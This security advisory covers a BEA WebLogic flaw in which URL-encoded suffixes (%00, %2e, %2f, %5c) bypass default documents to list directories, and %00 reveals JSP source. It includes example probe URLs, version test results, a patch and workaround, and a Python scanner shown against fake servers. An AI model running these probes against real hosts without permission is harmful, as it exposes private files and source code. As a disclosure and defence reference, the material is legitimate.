Vulnerability: WebLogic directory browsing and JSP source disclosure

Affected: BEA WebLogic Server 6.0 and prior

Description

The following is based on Defcom Labs Advisory def-2001-14 by Peter Grundl.

BEA WebLogic Server contains a flaw that allows directory browsing even when a directory contains a default document. By requesting a folder URL and ending it with one of the following URL-encoded sequences, %00, %2e, %2f or %5c, it is possible to bypass the serving of the default document (e.g. index.html) and browse the contents of the web folder.

Examples:

http://www.foo.org/%00/
http://www.foo.org/images/%2e/
http://www.foo.org/passwords/%2f/
http://www.foo.org/creditcard/%5c/

The four encoded sequences decode to NUL, ".", "/" and "\".

It is interesting to note that similar (in fact, worse) behaviour is exhibited in both WebLogic 4.5.1 and 5.1: appending '%00' to the end of a .jsp request retrieves the source of the JSP instead of its rendered output. Results look something like this:

4.5.1 SP13 Single : Yes
4.5.1 SP13 Cluster: Yes
4.5.1 SP11 Single : Yes
4.5.1 SP11 Cluster: No
5.1 SP6 Single    : Yes
5.1 SP3 Single    : Yes

This has been reproduced on WL 4.5.1 SP11 and SP13 in both cluster and standalone configurations. It has also been reproduced with 5.1 SP6 and SP3, all in a Solaris environment.

Tried it on AIX 4.3.3 with WebLogic 5.1.0 Service Pack 6: it works!

The negative result above, obtained with SP11, turned out to be quite interesting: it occurs only when the request is passed through libproxy.so 4.5.1 SP7. Testing directly against the WebLogic server, the %00 trick works. When proxied (through Netscape Enterprise Server) via solaris/libproxy.so 4.5.1 SP8, SP9, SP11, SP11 (with fix) and SP13, it also works. When proxied through 4.5.1 SP7, it does not.

Solution

Download and install WebLogic 6.0 with Service Pack 1:
http://commerce.bea.com/downloads/weblogic_server.jsp#wls

For some people installing 6.0 SP1 might not be an option. Those people are advised to contact BEA Systems Support for assistance with this issue. As a workaround, in the WLS console set the "index directory" setting from "enabled" to "disabled". It should be noted that this will not fix the JSP source-code disclosure that Adam Boileau reported to Bugtraq in response to the original posting of this advisory.
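The checks described above, as an added example that is not part of the original advisory or of BEA's software: a small Python script that builds the four bypass URLs for a web folder and the %00 probe for a JSP, classifies what comes back, and runs the probes against a constructed stand-in server so it works offline. The host name www.foo.org is taken from the advisory; the fake servers, the response bodies and the marker regexes are assumptions for illustration and do not reproduce WebLogic's real index-page format. To test a live host, pass a real fetch function (anything returning a (status, body) pair) to scan() instead of the fake.

```python
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlsplit

# The four URL-encoded bytes the advisory says bypass the default document:
# NUL, ".", "/" and "\".
BYPASS_SUFFIXES = ("%00", "%2e", "%2f", "%5c")

Response = Tuple[int, str]            # (HTTP status, response body)
Fetch = Callable[[str], Response]     # any function that fetches a URL


def listing_probes(folder_url: str) -> List[str]:
    """Build the four bypass URLs for one folder,
    e.g. http://www.foo.org/images/ -> http://www.foo.org/images/%2e/ ..."""
    base = folder_url.rstrip("/")
    return [f"{base}/{suffix}/" for suffix in BYPASS_SUFFIXES]


def jsp_source_probe(jsp_url: str) -> str:
    """Append the NUL escape that made 4.5.1 / 5.1 return JSP source."""
    return jsp_url + "%00"


# Heuristic markers (assumptions): a generated directory index versus raw
# JSP source look nothing alike, so simple patterns are enough for a triage.
_LISTING = re.compile(r"Index of|Parent Directory|<a href=\"[^\"]+/\">", re.I)
_JSP_SOURCE = re.compile(r"<%@|<%=|<%!|<%\s")


def classify_listing(resp: Response) -> str:
    """'listing' = directory index leaked, 'default_doc' = index page served,
    'blocked' = non-200 response."""
    status, body = resp
    if status != 200:
        return "blocked"
    return "listing" if _LISTING.search(body) else "default_doc"


def classify_jsp(resp: Response) -> str:
    """'source_disclosed' if the body contains JSP directives/scriptlets."""
    status, body = resp
    if status == 200 and _JSP_SOURCE.search(body):
        return "source_disclosed"
    return "rendered_or_blocked"


def scan(fetch: Fetch, folders: List[str], jsps: List[str]) -> Dict[str, str]:
    """Run every probe through `fetch` and return {probe_url: verdict}."""
    results: Dict[str, str] = {}
    for folder in folders:
        for url in listing_probes(folder):
            results[url] = classify_listing(fetch(url))
    for jsp in jsps:
        url = jsp_source_probe(jsp)
        results[url] = classify_jsp(fetch(url))
    return results


# Constructed stand-ins for a server so the example runs offline. They mimic
# the behaviour the advisory describes; the bodies are NOT real WebLogic output.
_FAKE_INDEX = "<html><head><title>Welcome</title></head><body>Hello</body></html>"
_FAKE_LISTING = ('<html><head><title>Index of /images/</title></head><body>'
                 '<a href="../">Parent Directory</a><a href="logo.gif">logo.gif</a>'
                 '</body></html>')
_FAKE_JSP_OUT = "<html><body>Hello, guest</body></html>"
_FAKE_JSP_SRC = ('<%@ page import="java.util.*" %>\n'
                 '<html><%= request.getParameter("u") %></html>')


def vulnerable_fake_server(url: str) -> Response:
    """Behaves like an unpatched host: bypass suffixes list the folder,
    .jsp%00 returns the JSP source."""
    path = urlsplit(url).path          # urlsplit keeps the %xx escapes intact
    if path.endswith(".jsp%00"):
        return 200, _FAKE_JSP_SRC
    if path.endswith(".jsp"):
        return 200, _FAKE_JSP_OUT
    if any(path.endswith(s + "/") for s in BYPASS_SUFFIXES):
        return 200, _FAKE_LISTING
    return 200, _FAKE_INDEX


def patched_fake_server(url: str) -> Response:
    """Behaves like a fixed host: the JSP is always executed and the default
    document is served even when a bypass suffix is appended."""
    path = urlsplit(url).path
    if path.endswith(".jsp") or path.endswith(".jsp%00"):
        return 200, _FAKE_JSP_OUT
    return 200, _FAKE_INDEX


if __name__ == "__main__":
    for name, server in (("vulnerable", vulnerable_fake_server),
                         ("patched", patched_fake_server)):
        print(f"--- {name} ---")
        for url, verdict in scan(server, ["http://www.foo.org/images/"],
                                 ["http://www.foo.org/login.jsp"]).items():
            print(f"{verdict:20} {url}")
```

Because the probes are separate from the fetch function, the same scan() can be pointed at a direct connection and at a path through a front-end proxy; the advisory notes that libproxy.so 4.5.1 SP7 masked the %00 result, so comparing both routes is the check a practitioner would want before concluding a host is not affected.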